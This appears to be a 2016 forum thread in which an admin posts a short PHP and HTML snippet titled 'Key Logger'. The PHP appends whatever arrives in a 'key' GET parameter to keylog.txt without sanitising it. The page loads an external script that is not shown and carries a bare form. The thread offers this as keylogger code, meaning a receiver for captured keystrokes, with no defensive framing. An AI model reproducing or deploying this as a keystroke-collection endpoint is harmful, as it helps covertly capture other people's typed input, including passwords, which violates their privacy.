PC & IT SUPPORT MADE EASY FORUM
Would you like to react to this message? Create an account in a few clicks or log in to continue.

PHP & HTML Key Logger

Go down

PHP & HTML Key Logger Empty PHP & HTML Key Logger

Post by jamied_uk 13th June 2016, 23:26

Code:
<?php
ini_set("display_errors", "1");
error_reporting(E_ALL);

$logfile="keylog.txt";
$key=$_GET['key'];
if($key !=""){
$current = file_get_contents($logfile);
$key .=$current;
file_put_contents($logfile, $key);
}
?>
<script src="js/js.js"></script>
<form>
<input name="key" action="GET" type="text">
<input type="submit">
</form>


Last edited by jamied_uk on 13th June 2016, 23:38; edited 1 time in total
jamied_uk
jamied_uk
Admin

Posts : 2950
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

PHP & HTML Key Logger Empty Re: PHP & HTML Key Logger

Post by jamied_uk 13th June 2016, 23:31

jamied_uk
jamied_uk
Admin

Posts : 2950
Join date : 2010-05-09
Age : 41
Location : UK

https://jnet.sytes.net

Back to top Go down

Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum